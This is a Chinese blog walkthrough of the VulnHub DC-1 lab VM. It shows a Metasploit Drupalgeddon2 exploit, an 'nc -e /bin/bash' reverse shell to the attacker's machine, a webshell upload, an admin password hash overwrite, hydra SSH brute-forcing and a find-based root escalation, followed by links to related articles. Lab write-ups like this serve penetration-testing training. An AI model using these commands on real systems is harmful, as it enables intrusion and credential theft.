vulnhub DC:1靶场

最新推荐文章于 2023-09-19 15:20:49 发布
最新推荐文章于 2023-09-19 15:20:49 发布
阅读量314 收藏 1
点赞数 1
文章标签: linux 网络 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46420165/article/details/128466372
版权

靶场描述

DC-1是一个专门建造的易受攻击的实验室,目的是在渗透测试领域获得经验。

它旨在对初学者来说是一个挑战,但它的难易程度取决于您的技能和知识以及您的学习能力。

要成功完成这一挑战,您需要 Linux 技能、熟悉 Linux 命令行以及基本渗透测试工具的经验,例如可以在 Kali Linux 或 Parrot Security OS 上找到的工具。

有多种方法可以扎根,但是,我包括了一些包含初学者线索的标志。

总共有五个标志,但最终目标是在 root 的主目录中查找并读取该标志。您甚至不需要是 root 用户即可执行此操作,但是,您将需要 root 权限。

根据您的技能水平,您也许可以跳过查找大多数这些标志并直接进入root。

初学者可能会遇到以前从未遇到过的挑战,但谷歌搜索应该是获得完成此挑战所需的信息所需的全部内容

技术信息

DC-1 是一个基于 Debian 32 位构建的 VirtualBox VMware,因此在大多数 PC 上运行它应该没有问题。

它当前配置为桥接网络,但是,可以更改此设置以满足您的要求。网络是为 DHCP 配置的。

安装很简单 - 下载它,解压缩它,然后将其导入VMware,然后就可以了。

环境配置

靶场下载地址: https://www.vulnhub.com/entry/dc-1,292/

下载之后使用VMware导入DC -1.ova文件 启动就行 将网段设置为NAT

这样就算是成功

信息收集

扫描机器网卡上的所有ip

arp-scan -l

看一下kali的ip地址

ifconfig


靶机: 192.168.154.129 攻击机: 192.168.154.128

ping一下目标主机看看能不能ping通

利用nmap扫描一下端口

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -Pn -sV -p- 192.168.154.129
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-27 03:16 EST
Stats: 0:00:05 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
ARP Ping Scan Timing: About 100.00% done; ETC: 03:16 (0:00:00 remaining)
Nmap scan report for 192.168.154.129
Host is up (0.00081s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
46665/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:0E:CB:92 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.22 seconds

访问80端口 看看有什么东西

大致看了一下没什么东西

现在知道他是Drupal CMS

记得Drupal有个远程命令执行(CVE-2018-7600) 正好之前复现过的大致记得流程

漏洞利用

使用神器msf模块去搜索对应的exp

search drupal

使用exploit/unix/webapp/drupal_drupalgeddon2攻击模块

use exploit/unix/webapp/drupal_drupalgeddon2

使用payload

set payload php/meterpreter/reverse_tcp

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.154.129
rhosts => 192.168.154.129
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set lhost 192.168.154.128
lhost => 192.168.154.128
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run

[*] Started reverse TCP handler on 192.168.154.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (39927 bytes) to 192.168.154.129
[*] Meterpreter session 1 opened (192.168.154.128:4444 -> 192.168.154.129:56570) at 2022-12-27 03:23:55 -0500

meterpreter >

成功获得一个meterpreter,使用kali去反弹一个交互式的shell

nc -e /bin/bash 192.168.154.128 7777

nc -lvvp 7777

第一个flag

他的意思大概是 每一个好的CMS都需要一个配置文件

so 我们查看配置文件

第二个flag

成功获得第二个flag 发现还有数据库的一些账号密码信息,登入到数据库看看

'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',

啊 怎么回事数据库连接不上 这是怎么回事?知道的大佬麻烦告诉小弟一下我

我试了好几次 都未成功 最后将shell反弹到本机试了一下也是这样没有反应 算了 正好要下班了

回到家的时候 想到是不是可以写一个木马文件进去 蚁剑不是有一个数据操作

写是写进去了但是他将request函数过滤了,还得绕过太麻烦了

想到他既然可以写入是不是也可以下载呢 那就试试吧

在本机利用python3开启了一个http服务 至于为什么不用python2开是因为命令没记住

python3 -m http.server 7777

首先目录得有一个php的木马文件然后进入cmd

下载好了

我们进入目标站点看看

不负所望啊

然后蚁剑进行连接

连接成功 现在进行连接数据库

好了 话不多说有点迫不及待的看看数据库里面的东西

看到了两个库 flag文件说了在drupaldb这个库里面

翻了翻这个库发现了users表,查了一下用户名

现在查密码

好吧 还被加密了 这是什么加密方式 ???

网上查了一下说是新型的hash加密

Drupal 7已不再采用Drupal 6和5时代的简单的MD5加密了。据某个帖子说是因为现在有一个在线的MD5数据库,可以查到很多MD5码的原文,因此Drupal 7的开发者认为不能再继续采用这种极不安全的方法了,因此Drupal 7采用了新型的Hash加密方法来确保密码安全。

新型的hash加密

Drupal可以利用password-hash.sh文件来生成此种加密的

find / -name password-hash*
/var/www/scripts/password-hash.sh
cd /var/www/scripts/

发现/var/www/scripts/password-hash.sh ,于是到www目录下,然后运行

scripts/password-hash.sh admin

返回到数据库中更改密码

update users set pass="$S$D5Icw5I2FlS7lnwztuc.cyD6LnbroQVTnaSmiHSGZGxIuD7jpbJ9" where uid = 1;

返回目标站点进行登录,寻找flag3

第三个flag

于是根据提示进入etc/passwd,找到了flag4账户

利用kali自带的hydra和rockyou.txt进行破解

hydra -l flag4 -P /usr/share/wordlists/rockyou.txt ssh://192.168.154.129 	//爆破密码

出现报错 意思是没有发现rockyou.txt文件,不对啊 这个字典是自带的

进入目录看看

cd /usr/share/wordlists/

原来是没有解压,将其解压就好了

gunzip rockyou.txt.gz

重新输入命令

发现password为orange

破解完成之后连接到flag4账户

查看flag4

第四个flag

他的意思是不能用相同的办法来访问根目录 权限不够需要提权

提权

提权我们利用find提权

find -name flag4.txt -exec /bin/bash -p \;

然后进入根目录寻找flag5

第五个flag

在root 目录下找到了最后的flag,最后5个flag全部找到了

栖迟!
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
vulnhub靶场实战:DC-1
huangyongkang666的博客
04-18 4469
vulnhub实战:DC-1 1.DC-1介绍 DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。 总共有五个flag,但最终目标是在root的主目录中找到并读取
渗透入门:DC-1主机渗透详细教学
2301_77472496的博客
09-19 1109
DC系列靶场是一组专门为渗透测试而设计的易受攻击的实验室,共有九个靶场。它的目的是让初学者获得渗透测试领域的经验,但是它的难度取决于你的技能和知识,以及你的学习能力。
Vulnhub系列之DC1靶场详解
weixin_54960572的博客
08-09 314
提示-exec,linux中的 exec命令,-exec 后面跟的是linux的 command 命令,exec命令以分号结束;目录是用于存储用户密码信息的文件目录,也被称为“影子文件”。该目录只有root用户拥有读权限,其他用户不能直接查看或修改该目录下的文件。因此,这个命令的作用是在Linux系统的根目录下找到所有文件,并以管理员权限在每个文件上执行Bash shell。若不指定,则修改表中所有的行。尝试验证后发现编号为1的exp可以利用,选择进入。提示shadow,在Linux系统中
DC-1靶场搭建及渗透实战详细过程(DC靶场系列)
热门推荐
金 帛的博客
06-29 1万+
DC-1靶场渗透过程,写的有点多,把许多方法尽可能地列出来了,也参考了很多别的文章,希望对刚学习web渗透的小白有所帮助吧!
DC系列漏洞靶场-渗透测试学习复现(DC-1)
W983079520的博客
11-01 2703
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们拿到最后的root身份,过程还是挺有趣的! DC系列靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip(DC后的数字可以换成1-8中任意一个) DC-1是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 DC-1提权关键词:find
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
DC-1靶场渗透实验
Alashan12的博客
05-05 1925
一、环境准备 Kali虚拟机 DC-1靶场http://www.five86.com/downloads/DC-1.zip 首先将kali虚拟机和靶机DC1都设置为net模式 ifconfig查看kali的IP为192.168.152.128 使用nmap扫描此网段下的主机 启动DC-1靶机 再次扫描得到DC-1靶机的IP地址为192.168.152.138 二、实验过程 使用nmap针对该IP进行详细扫描 发现打开了22、80和111的端口,还开启了s...
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 8019
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
DC靶场系列--DC1
BGiscool的博客
06-28 4854
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1是vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
DC-1 靶场学习
akxnxbshai的博客
02-24 709
练习一下工具使用。
DC-1靶场通关笔记
告白的博客
07-19 732
0x00 DC-1靶场介绍 靶场介绍:关于VulnhubVulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试 渗透要求:靶机需要获得root权限,并找到所有的5个flag 环境配置:因不知道DC-1靶机的IP,所有我们需要将靶机和kali放在同一个局域网里面,这里我选择NAT模式 0x01 信息收集 首先进去DC-1靶场环境,显示一个登录页面,我们无法得到账户与密码,因为靶机在NAT模式,故可以用域内存活主机利用工具扫描域内存活主机 1)目标IP收集 这里利用kali扫描域内存
渗透测试初体验:DC-1靶场
SmileAssassn的博客
08-07 455
渗透测试靶场DC:1,新手练习使用
DC-1靶场
xhx836161547的博客
12-15 295
DC-1靶场练习报告
Vulhub-DC-1靶场通关攻略
weixin_51339377的博客
03-16 3591
靶场环境配置: 修改为usb1.0同时新建网络,把网络修改为NAT即可 首先开启靶机环境和kali黑客机器环境 通过NAT模式可以保证两者处于同一个内网环境中 切记 vmware和virtualbox的虚拟网卡可能网段不同 所以要保证kali和靶机在同一个网段 否则无法扫描到相应的靶机 1.第一步 通过kali中自带的一个工具 arp-scan进行内网存活主机探测 arp-scan -l 2.接下来可以借助nmap对目标进行扫描 其中 -sV服务指纹识别 可以探测目标系统...
《Vulhub-DC-1靶场实战》
weixin_47118413的博客
07-06 2229
DC系列目前总共有9个靶机,本次靶机是DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。
VulnHub入门教程:DC-1靶场攻破指南
"DC-1 是一个专门为渗透测试学习设计的漏洞靶场,由 ins1ght 作者提供,适合初级者。靶机于2019年2月28日发布,包含五个旗标,最终目标是找到并读取 root 用户主目录中的旗标,可能需要具备 Linux 技能、熟悉 Linux ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值